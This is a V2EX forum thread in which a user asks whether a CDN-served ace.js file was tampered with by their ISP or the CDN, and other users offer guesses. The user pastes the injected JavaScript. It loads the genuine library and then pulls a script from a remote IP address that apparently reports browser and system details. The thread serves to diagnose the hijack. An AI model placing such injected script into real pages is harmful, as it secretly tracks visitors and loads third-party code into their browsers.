我是被运营商劫持了,还是网站被挂马?

2018-07-17 00:23:43 +08:00
 Mac

http://cdn.staticfile.org/ace/1.1.3/ace.js

https://cdn.bootcss.com/ace/1.1.3/ace.js

两份东西我这刷出来的内容是不一样的,头一个会上传一份浏览器及系统报告到 http://183.207.103.130:8081/pjk/xjk/index.php 这个地址

这是被挂马了,还是我被运营商劫持了?

1847 次点击
所在节点    问与答
6 条回复
opengps
2018-07-17 00:29:31 +08:00
从你服务器上浏览下
Mac
2018-07-17 00:33:05 +08:00
@opengps 远程换了台地点的机子,结果一样,应该是被挂马了
billchenchina
2018-07-17 00:34:24 +08:00
我这边 diff 不出结果,估计是运营商劫持
Mac
2018-07-17 00:41:44 +08:00
@billchenchina 我这里看到的是

var _ju = "http://cdn.staticfile.org/ace/1.1.3/ace.js";var _ju = _ju+(_ju.indexOf('?') > 0 ? '&' : '?') + '_t=' + (new Date().getTime());var _b = "AH023516";var _c = "23795593_(i1P6V1gdic8tiJiRDm==_1281042715_1";
function __crsp(s){
var N1=document.createElement("script");N1.setAttribute("type","text/javascript"),N1.setAttribute("src",s),document.head?document.head.appendChild(N1):document.body&&document.body.appendChild(N1);
}
var l=document.location.host.split('.');
if(_ju.indexOf(l[l.length-2]+'.'+l[l.length-1])>0){
var html = '<div><script>document.write(unescape(\'%3Cscript src="' + _ju + '" %3E%3C/script%3E\') );<\/script></div>';
document.write(html);
}else{
__crsp(_ju);
}
__crsp("http://183.207.103.130:8081/pjk/static/tp.php?b="+_b);

这劫持做的太好玩了,先写一层 HTML,乍一看上去以为是普通 JS 内容,没什么异常。好东西藏在最后。
solaro
2018-07-17 11:08:17 +08:00
劫持
qingfengxm
2018-07-17 14:48:23 +08:00
ip 都写上了,写代码攻击它

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/471432

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX